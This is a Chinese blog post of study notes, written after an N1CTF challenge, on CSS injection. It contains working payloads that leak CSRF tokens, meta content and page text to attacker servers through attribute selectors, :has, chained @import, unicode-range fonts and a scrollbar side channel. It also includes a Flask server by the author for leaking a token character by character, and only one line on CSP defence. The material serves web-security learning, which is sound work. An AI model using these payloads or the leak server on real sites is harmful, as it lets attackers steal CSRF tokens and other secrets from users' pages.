前端安全10-CSS injection（笔记）

前言

没想到N1CTF出了css注入的题，第一眼就觉得是css注入，可惜那时候没学到这块，而且当时还在省赛（虽然应该也做不出来）

• https://aszx87410.github.io/beyond-xss/ch3/css-injection/

CSS注入简介

CSS可以通过判断属性中是否存在某个值，然后向外请求图片，这样就可以偷取存在于页面中的东西了，但是像 document.cookie 应该还是没办法的

利用CSS偷取信息

CSS有两个特性，当把两个特性结合在一起的时候就可以进行攻击了

1. 属性选择器

• input[value^=a] 可以选择到开头是a的
• input[value$=a] 选择结尾是a的
• input[value*=a] 选择含有a的

1. 发送请求
   在上面的判断成功后，可以向外发送请求，否则就收不到请求，很经典的类似于bool注入的攻击手法了

   input[name="secret"][value^="a"] {
     background: url(https://myserver.com?q=a)
   }
   
   input[name="secret"][value^="b"] {
     background: url(https://myserver.com?q=b)
   }
   //....

   这里的input就是input标签，如果想选取例如 <a> 就可以

   <style>
   a[name="secret"][href^="a"] {
     background: url(http://101.43.112.74:9001/?q=a)
   }
   </style>
   
   <a name="secret" href="abc">a</a>

hidden属性如何偷取

现在页面有如下的代码，应该如何取盗取他的token

<form action="/action">
  <input type="hidden" name="csrf-token" value="abc123">
  <input name="username">
  <input type="submit">
</form>

如果直接构造前面的那个payload是没有效果的

input[name="csrf-token"][value^="a"] {
  background: url(https://example.com?q=a)
}

因为他是hidden属性，并不会显示到页面上，css就不会去加载他
这时候可以去选取他的下一个属性

input[name="csrf-token"][value^="a"] + input {
  background: url(https://example.com?q=a)
}

因为他的下一个属性是存在于页面中的，这时候就能去加载，但是如果这个hidden在最后，比如

<form action="/action">
  <input name="username">
  <input type="submit">
  <input type="hidden" name="csrf-token" value="abc123">
</form>

上面的方法就没法用了

在form外面的是没法加载的，比如你的css是

input[name="csrf-token"][value^="a"] + a {
  background: url(http://101.43.112.74:9001)
}

你的代码是

<form action="/action">
  <input name="username">
  <input type="submit">
  <input type="hidden" name="csrf-token" value="abc123">
</form>
<a href=#></a>

这样是不会有发出请求的

:has 现在有这么一个选择器

form:has(input[name="csrf-token"][value^="a"]){
  background: url(https://example.com?q=a)
}

有这个选择器几乎就可以随便选了，但是目前firefox还不支持这个选择器。

偷meta

一般是通过js获取token，然后去提交

<!DOCTYPE html>
<html>
<head>
    <meta name="csrf-token" content="abc123"> <!-- 这是CSRF令牌 -->
    <title>CSRF Token Example</title>
</head>
<body>
    <button id="submit-button">提交</button>

    <script>
        document.getElementById("submit-button").addEventListener("click", function() {
            // 从<meta>标签中获取CSRF令牌
            var csrfToken = document.querySelector('meta[name="csrf-token"]').getAttribute('content');
            
            // 创建一个HTTP请求
            var xhr = new XMLHttpRequest();
            
            // 配置请求
            xhr.open("POST", "/process", true);
            
            // 设置请求头，包括CSRF令牌
            xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
            xhr.setRequestHeader("X-CSRF-Token", csrfToken);
            
            // 定义请求完成时的回调函数
            xhr.onload = function() {
                if (xhr.status === 200) {
                    alert("请求成功！");
                } else {
                    alert("请求失败！");
                }
            };
            
            // 发送请求
            xhr.send("data=example_data");
        });
    </script>
</body>
</html>

当然，同样可以通过has过滤器去攻击

html:has(meta[name="csrf-token"][content^="a"]) {
  background: url(http://exp/);
}

但是meta可以被设置为可见的，与hidden的input不同，不过head也是不可见的，要把head一起设置为可见的（就算不把meta写到head中，浏览器也会自己把他调到head中）

head,meta {
  display: block;  
}

meta[name="csrf-token"][content^="a"] {
  background: url(http://exp/);
}

图片不会显示出来，是因为content只是一个属性，并不是HTML的text，但是meta是可见的，只不过他的高度为0

meta:before {
    content: attr(content);
}

但是可以利用上面的代码去显示图片

一次性偷取所有字符

前面讲解的方法都只能偷取一次，但是css有一个特性

@import url(https://myserver.com/start?len=8)

可以通过上面的代码引入css，那么用下面的代码就可以一次一次去请求value

<style>@import url(https://myserver.com/payload?len=1)</style>
<style>@import url(https://myserver.com/payload?len=2)</style>
<style>@import url(https://myserver.com/payload?len=3)</style>
<style>@import url(https://myserver.com/payload?len=4)</style>
<style>@import url(https://myserver.com/payload?len=5)</style>
<style>@import url(https://myserver.com/payload?len=6)</style>
<style>@import url(https://myserver.com/payload?len=7)</style>
<style>@import url(https://myserver.com/payload?len=8)</style>

这里我设计了一个服务端的脚步用于一次性的css注入

点击显/隐内容

from flask import Flask, render_template,request,make_response
import string,time
app = Flask(__name__)


@app.route("/payload",methods = ["GET"])
def payload():
    length = int(request.args.get("len"))
    while True:
        with open("prefix","r") as f:
            prefix = f.read()
        with open("suffix","r") as f:
            suffix = f.read()

        if len(prefix) < length-1 or len(suffix) < length-1:
            time.sleep(1)
        else:
            break
    
    prefixs = []
    for x in string.ascii_letters+string.digits:
        prefixs.append(csspayload("^","prefix",prefix+x))
    
    suffixs = []
    for x in string.ascii_letters+string.digits:
        suffixs.append(csspayload("$","suffix",x+suffix))

    prefixs = '\n'.join(prefixs)
    suffixs = '\n'.join(suffixs)

    rsp = make_response(prefixs + '\n' + suffixs)
    rsp.headers['Content-Type']= "text/css"

    return rsp


def csspayload(symbol,fix,payload):
    if fix == 'prefix':
        origin = \
    '''input[name="csrf-token"][value{symbol}="{payload}"] + input {{background: url(http://192.168.3.189:5002/{fix}?q={payload})}}'''.format(symbol=symbol,fix=fix,payload=payload)
    else:
        origin = \
    '''input[name="csrf-token"][value{symbol}="{payload}"] + input {{border-image: url(http://192.168.3.189:5002/{fix}?q={payload})}}'''.format(symbol=symbol,fix=fix,payload=payload)
    return origin


@app.route("/prefix",methods = ["GET"])
def prefix():
    q = request.args.get("q")
    with open("prefix",'w') as f:
        f.write(q)

    rsp = make_response("")
    rsp.headers['Content-Type']= "image/jpeg"
    return rsp


@app.route("/suffix",methods = ["GET"])
def suffix():
    q = request.args.get("q")
    with open("suffix",'w') as f:
        f.write(q)
    rsp = make_response("")
    rsp.headers['Content-Type']= "image/jpeg"
    return rsp

if __name__ == '__main__':
    app.run(debug=True, host='0.0.0.0', port='5002')

想加快效率，可以通过prefix和suffix的结合来实现两个字符的提取，但是suffix的时候要把 background 改为border-image ，不然的话内容会被覆盖掉，就不会发出请求了

记录一下踩过的坑

1. 返回的content-type必须设置为text/css
2. import url最好和background url不一样（没仔细看文章）
3. 要用border-image，border-background用不了
4. 从后读取字符的时候，要x+suffix，而不是suffix+x

偷其他东西

unicode-range

通过这种方法可以偷取到其他元素的东西

<!DOCTYPE html>
<html>
  <body>
    <style>
      @font-face {
        font-family: "f1";
        src: url(https://myserver.com?q=1);
        unicode-range: U+31;
      }

      @font-face {
        font-family: "f2";
        src: url(https://myserver.com?q=2);
        unicode-range: U+32;
      }

      @font-face {
        font-family: "f3";
        src: url(https://myserver.com?q=3);
        unicode-range: U+33;
      }

      @font-face {
        font-family: "fa";
        src: url(https://myserver.com?q=a);
        unicode-range: U+61;
      }

      @font-face {
        font-family: "fb";
        src: url(https://myserver.com?q=b);
        unicode-range: U+62;
      }

      @font-face {
        font-family: "fc";
        src: url(https://myserver.com?q=c);
        unicode-range: U+63;
      }

      div {
        font-size: 4em;
        font-family: f1, f2, f3, fa, fb, fc;
      }
    </style>
    Secret: <div>ca31a</div>
  </body>
</html>

执行结果如下
chrome:

firefox:

这种方法在chrome中可能不会按照顺序，但是在firefox中是按照顺序的，从图中还可以看到一个问题，就是他不会重复盗取字符，每种字符只能盗取一次

字体高度差异+scrollbar+first-line

1. 字体高度差异
   假设现在有一种字体 Comic Sans MS ，高度比另一个 Courier New 高。

   <html>
     <body>
       <style>
         @font-face {
           font-family: "fa";
           src:local('Comic Sans MS');
           font-style:monospace;
           unicode-range: U+41;
         }
         div {
           font-size: 30px;
           height: 40px;
           width: 100px;
           font-family: fa, "Courier New";
           letter-spacing: 0px;
           word-break: break-all;
           overflow-y: auto;
           overflow-x: hidden;
         }
         
       </style>
       Secret: <div>DBC</div>
       <div>ABC</div>
     </body>
   </html>

   

2. scrollbar
   根据css定义，当内容超过容器高度就会出现scrollbar，那么就可以通过给scrollbar设定背景，进行leak

   div::-webkit-scrollbar {
       background: blue;
   }
   
   div::-webkit-scrollbar:vertical {
       background: url(https://myserver.com?q=a);
   }

3. first-line
   现在的问题就是如何解决顺序问题了。
   当把div的宽度设置为20（只能显示一个字母），那么其他字母就会被放到第二行，并且把字体尺寸设置为0。接着用first-line这个选择器把第一行的字改为正常尺寸。这样scrollbar的背景图就能正常加载了，说着有点绕，可以看看代码

   <!DOCTYPE html>
   <html>
     <body>
       <style>
         @font-face {
           font-family: "fa";
           src:local('Comic Sans MS');
           font-style:monospace;
           unicode-range: U+41;
         }
         div {
           font-size: 0px; //尺寸设置为0
           height: 40px;
           width: 20px; //宽度只够展示一个字符
           font-family: fa, "Courier New";
           letter-spacing: 0px;
           word-break: break-all;
           overflow-y: auto;
           overflow-x: hidden;
         }
   
         div::first-line{
           font-size: 30px; //用选择器把第一行的字符改为正常的
         }
   
       </style>
       Secret: <div>CBAD</div>
     </body>
   </html>

详细demo可以参考这个 https://demo.vwzq.net/css2.html

点击显/隐内容

<!doctype html>
<html>
<head>
<!-- look mom! no external fonts allowed! -->
<meta http-equiv="Content-Security-Policy" content="default-src 'self'; style-src 'unsafe-inline'; font-src 'none';">
<body>
<style>
/* comic sans is high (lol) and causes a vertical overflow */
@font-face{font-family:has_A;src:local('Comic Sans MS');unicode-range:U+41;font-style:monospace;}
@font-face{font-family:has_B;src:local('Comic Sans MS');unicode-range:U+42;font-style:monospace;}
@font-face{font-family:has_C;src:local('Comic Sans MS');unicode-range:U+43;font-style:monospace;}
@font-face{font-family:has_D;src:local('Comic Sans MS');unicode-range:U+44;font-style:monospace;}
@font-face{font-family:has_E;src:local('Comic Sans MS');unicode-range:U+45;font-style:monospace;}
@font-face{font-family:has_F;src:local('Comic Sans MS');unicode-range:U+46;font-style:monospace;}
@font-face{font-family:has_G;src:local('Comic Sans MS');unicode-range:U+47;font-style:monospace;}
@font-face{font-family:has_H;src:local('Comic Sans MS');unicode-range:U+48;font-style:monospace;}
@font-face{font-family:has_I;src:local('Comic Sans MS');unicode-range:U+49;font-style:monospace;}
@font-face{font-family:has_J;src:local('Comic Sans MS');unicode-range:U+4a;font-style:monospace;}
@font-face{font-family:has_K;src:local('Comic Sans MS');unicode-range:U+4b;font-style:monospace;}
@font-face{font-family:has_L;src:local('Comic Sans MS');unicode-range:U+4c;font-style:monospace;}
@font-face{font-family:has_M;src:local('Comic Sans MS');unicode-range:U+4d;font-style:monospace;}
@font-face{font-family:has_N;src:local('Comic Sans MS');unicode-range:U+4e;font-style:monospace;}
@font-face{font-family:has_O;src:local('Comic Sans MS');unicode-range:U+4f;font-style:monospace;}
@font-face{font-family:has_P;src:local('Comic Sans MS');unicode-range:U+50;font-style:monospace;}
@font-face{font-family:has_Q;src:local('Comic Sans MS');unicode-range:U+51;font-style:monospace;}
@font-face{font-family:has_R;src:local('Comic Sans MS');unicode-range:U+52;font-style:monospace;}
@font-face{font-family:has_S;src:local('Comic Sans MS');unicode-range:U+53;font-style:monospace;}
@font-face{font-family:has_T;src:local('Comic Sans MS');unicode-range:U+54;font-style:monospace;}
@font-face{font-family:has_U;src:local('Comic Sans MS');unicode-range:U+55;font-style:monospace;}
@font-face{font-family:has_V;src:local('Comic Sans MS');unicode-range:U+56;font-style:monospace;}
@font-face{font-family:has_W;src:local('Comic Sans MS');unicode-range:U+57;font-style:monospace;}
@font-face{font-family:has_X;src:local('Comic Sans MS');unicode-range:U+58;font-style:monospace;}
@font-face{font-family:has_Y;src:local('Comic Sans MS');unicode-range:U+59;font-style:monospace;}
@font-face{font-family:has_Z;src:local('Comic Sans MS');unicode-range:U+5a;font-style:monospace;}
@font-face{font-family:has_0;src:local('Comic Sans MS');unicode-range:U+30;font-style:monospace;}
@font-face{font-family:has_1;src:local('Comic Sans MS');unicode-range:U+31;font-style:monospace;}
@font-face{font-family:has_2;src:local('Comic Sans MS');unicode-range:U+32;font-style:monospace;}
@font-face{font-family:has_3;src:local('Comic Sans MS');unicode-range:U+33;font-style:monospace;}
@font-face{font-family:has_4;src:local('Comic Sans MS');unicode-range:U+34;font-style:monospace;}
@font-face{font-family:has_5;src:local('Comic Sans MS');unicode-range:U+35;font-style:monospace;}
@font-face{font-family:has_6;src:local('Comic Sans MS');unicode-range:U+36;font-style:monospace;}
@font-face{font-family:has_7;src:local('Comic Sans MS');unicode-range:U+37;font-style:monospace;}
@font-face{font-family:has_8;src:local('Comic Sans MS');unicode-range:U+38;font-style:monospace;}
@font-face{font-family:has_9;src:local('Comic Sans MS');unicode-range:U+39;font-style:monospace;}
@font-face{font-family:rest;src: local('Courier New');font-style:monospace;unicode-range:U+0-10FFFF}

div.leak {
    overflow-y: auto; /* leak channel */
    overflow-x: hidden; /* remove false positives */
    height: 40px; /* comic sans capitals exceed this height */
    font-size: 0px; /* make suffix invisible */
    letter-spacing: 0px; /* separation */
    word-break: break-all; /* small width split words in lines */
    font-family: rest; /* default */
    background: grey; /* default */
    width: 0px; /* initial value */
    animation: loop step-end 200s 0s, trychar step-end 2s 0s; /* animations: trychar duration must be 1/100th of loop duration */
    animation-iteration-count: 1, infinite; /* single width iteration, repeat trychar one per width increase (or infinite) */
}

div.leak::first-line{
    font-size: 30px; /* prefix is visible in first line */
    text-transform: uppercase; /* only capital letters leak */
}

/* iterate over all chars */
@keyframes trychar {
    5% { font-family: has_A, rest; --leak: url(http://127.0.0.1/?a); }
    6% { font-family: rest; }
    10% { font-family: has_B, rest; --leak: url(http://127.0.0.1/?b); }
    11% { font-family: rest; }
    15% { font-family: has_C, rest; --leak: url(http://127.0.0.1/?c); }
    16% { font-family: rest }
    20% { font-family: has_D, rest; --leak: url(http://127.0.0.1/?d); }
    21% { font-family: rest; }
    25% { font-family: has_E, rest; --leak: url(http://127.0.0.1/?e); }
    26% { font-family: rest; }
    30% { font-family: has_F, rest; --leak: url(http://127.0.0.1/?f); }
    31% { font-family: rest; }
    35% { font-family: has_G, rest; --leak: url(http://127.0.0.1/?g); }
    36% { font-family: rest; }
    40% { font-family: has_H, rest; --leak: url(http://127.0.0.1/?h); }
    41% { font-family: rest }
    45% { font-family: has_I, rest; --leak: url(http://127.0.0.1/?i); }
    46% { font-family: rest; }
    50% { font-family: has_J, rest; --leak: url(http://127.0.0.1/?j); }
    51% { font-family: rest; }
    55% { font-family: has_K, rest; --leak: url(http://127.0.0.1/?k); }
    56% { font-family: rest; }
    60% { font-family: has_L, rest; --leak: url(http://127.0.0.1/?l); }
    61% { font-family: rest; }
    65% { font-family: has_M, rest; --leak: url(http://127.0.0.1/?m); }
    66% { font-family: rest; }
    70% { font-family: has_N, rest; --leak: url(http://127.0.0.1/?n); }
    71% { font-family: rest; }
    75% { font-family: has_O, rest; --leak: url(http://127.0.0.1/?o); }
    76% { font-family: rest; }
    80% { font-family: has_P, rest; --leak: url(http://127.0.0.1/?p); }
    81% { font-family: rest; }
    85% { font-family: has_Q, rest; --leak: url(http://127.0.0.1/?q); }
    86% { font-family: rest; }
    90% { font-family: has_R, rest; --leak: url(http://127.0.0.1/?r); }
    91% { font-family: rest; }
    95% { font-family: has_S, rest; --leak: url(http://127.0.0.1/?s); }
    96% { font-family: rest; }
}

/* increase width char by char, i.e. add new char to prefix */
@keyframes loop {
    0% { width: 0px }
    1% { width: 20px }
    2% { width: 40px }
    3% { width: 60px }
    4% { width: 80px }
    4% { width: 100px }
    5% { width: 120px }
    6% { width: 140px }
    7% { width: 0px }
}

div::-webkit-scrollbar {
    background: blue;
}

/* side-channel */
div::-webkit-scrollbar:vertical {
    background: blue var(--leak);
}
</style>
<p>single css injection w/o remote fonts to leak charset ft. @kinugawamasato's <a href="https://mksben.l0.cm/2015/10/css-based-attack-abusing-unicode-range.html">unicode-range</a> technique</p>
<p>the trick is using detectable layout differences between default fonts. there are probably many similar and more efficient methos.</p>
<hr>
<div class="leak">
cabdb
</div>

ligature + scrollbar

有点难，暂时不复现

防御方式

增加csp头，比如 style-src 'none' ，详情可以去翻看CSP那篇文章。